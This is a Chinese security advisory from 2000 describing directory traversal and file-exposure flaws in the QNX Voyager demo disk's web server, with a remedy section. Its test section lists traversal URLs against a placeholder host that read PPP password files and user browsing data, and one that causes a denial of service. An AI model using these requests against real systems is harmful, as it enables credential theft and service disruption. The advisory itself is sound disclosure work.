首页 -> 安全研究

安全研究

安全漏洞
QNX Voyager 存在多个WWW服务设计漏洞

发布日期:2000-09-07
更新日期:2000-09-07

受影响系统:

    QSSL Voyager 2.01B
       + QSSL QNX 4.05 Demo Disk
描述:

QNX Voyager demo disk提供的WWW服务软件存在几处漏洞。

首先,Voyager允许URL请求中使用相对路径,比如../,使得用户可以访问document
root之外的文件。其次,对WWW服务本身没有足够的安全限制,WWW服务可以访问任意
文件,包括本应受保护的文件,比如/dev目录下的文件。第三,因为WWW服务和WWW浏
览器集合在一起,Photon GUI所使用的信息很容易暴露,用户只需要请求位于
/.photon/目录下的文件即可。最后,WWW浏览器产生的html文件,比如错误信息一类
的文件,它们和QNX配置接口共享同一个目录。

<* 来源:(neonbunny@alt.ph.uk.com) *>




测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!


对WWW服务进行拒绝服务攻击:
http://www.victim.com/../../dev/dns

获取最近一次的PPP口令 (modem build of Voyager):
http://www.victim.com/../../etc/ppp/chap-secrets
http://www.victim.com/../../etc/ppp/pap-secrets

WWW浏览器配置文件
http://www.victim.com/.photon/voyager/config.full

最近访问过的站点
http://www.victim.com/.photon/voyager/history.html

书签站点
http://www.victim.com/.photon/voyager/hotlist

Photon GUI启动菜单内容列表
http://www.victim.com/.photon/pwm/pwm.menu

Modem初始化信息
http://www.victim.com/.photon/phdial/connection [Modem build only]

当前屏幕设置
http://www.victim.com/../../etc/config/trap/crt.cur.1


建议:

临时解决办法:
NSFOCUS建议您在厂商提供补丁以前暂时停止使用此WWW服务器。

厂商补丁:
暂无


浏览次数:5766
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障